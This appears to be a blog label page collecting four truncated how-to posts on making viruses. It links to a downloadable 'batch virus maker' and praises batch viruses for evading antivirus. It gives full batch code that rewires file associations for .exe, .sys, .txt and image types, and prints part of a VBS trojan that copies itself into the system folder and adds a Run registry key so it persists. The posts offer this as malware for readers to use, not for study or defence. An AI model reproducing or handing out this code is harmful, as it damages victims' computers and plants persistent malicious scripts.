Posts

Showing posts with the label Virus

BATCH VIRUS MAKER TOOL TO CREATE YOUR OWN VIRUSES

Image
BATCH VIRUS MAKER TOOL TO CREATE YOUR OWN VIRUSES Batch virus maker  tool is the one which can create batch viruses.The  properties and behaviour of the virus can be set by yourself.Batch  programs are essentially sequences of  DOS commands that ‘type themselves’ when the batch file is  run.Batch files consist of control elements, internal DOS commands and external commands or programs. With a little ingenuity one can duplicate most of the functions of a general purpose language, but doing any kind of math is tricky, there are no arithmetic commands at all. But most of us use Batch codes for creating viruses.One  of the important feature of batch viruses are it cant be detected easily by Antivirus systems. DOWNLOAD LINK DOWNLOAD VIRUS MAKER TOOL FOR FREE HOW TO CREATE BATCH VIRUSES 1. Download and extract all the files and open  virus maker , you can see a window as shown below. 2. Now give any name and press enter to see the windo...

HOW TO MAKE EXTENSION CHANGER VIRUS USING NOTEPAD

Image
HOW TO MAKE EXTENSION CHANGER VIRUS USING NOTEPAD In this article i am gonna show you how to make a virus that changes extension of  files.Even  though it is not a harmful virus it will change all the files extension and makes it unuseful for the user and he has to again change the files extension to its orginal one. What is Extension changer ? Assume that all images (*.jpeg, Gif etc) are by default opening with “Windows Picture and Fax Viewer” but in with this virus,this will change to some other application as you wish for ex: .mpeg application so that it cannot be opened in this way you can disable opening of jpeg application. HOW TO MAKE EXTENSION CHANGER VIRUS 1. Open a Notepad and copy and paste the below code @echo off assoc .txt=jpegfile assoc .exe=htmlfile assoc .jpeg=avifile assoc .png=mpegfile assoc .mpeg=txtfile assoc .sys=regfile msg Your System is cracked ….. exit Save it as  anyname.bat , and now your virus file is re...

NEW WAY TO BLOCK WEBSITES WITH VIRUS

Image
NEW WAY TO BLOCK WEBSITES WITH VIRUS Most of us are familiar with the virus that used to block Orkut and Youtube websites. If you are curious about creating such a virus on your own, here is how it can be done. As usual I am using my favorite programming language  ‘C’  to create this  website blocking virus . I will give a brief introduction about this virus before I jump into the technical jargon. This virus has been exclusively created in  ‘C’ . So, anyone with a basic knowledge of ‘C’ will be able to understand the working of this virus program. When this program is executed, it will block all those websites that are listed in the source code. In the following example, the sites that are listed in the source code are Google, Yahoo and Youtube. When you download the source code of this program, you have a choice to include your own list of sites that you want this virus to block. I have just removed the source code of this program from this post as it ...

HOW TO MAKE TROJAN VIRUS USING NOTEPAD

Image
HOW TO MAKE TROJAN VIRUS USING NOTEPAD Note the following copy all the source into notepad save as  .vbs  (if you want to activate) if not let it remain in the file  exstensi.txt exampels: ippamd0_trojanHorse.VBS Copy all the source below: brakes – dlRB “DL Reboot” Trojan script by D.L. On Error Resume Next FSobj dim, sysDir, generateCopy, newfile, fixedCode, procreateCopy, fileData set FSobj = CreateObject (“Scripting.FileSystemObject”) set sysDir = FSobj.GetSpecialFolder (1) createRegKey “HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows \ CurrentVersion \ Run \ dlRB”, sysDir & “\  dlRB.vbs ” sub createRegKey (regkey, regVal) set regedit = CreateObject (“ WScript.Shell ”) regEdit.RegWrite regkey, regVal end sub set generateCopy = FSobj.CreateTextFile (sysDir + “\  dlRB.vbs ”) generateCopy.close set newfile = FSobj.OpenTextFile (WScript.ScriptFullname, 1) setFile () fixedCode = replace (fileData, chr (94),...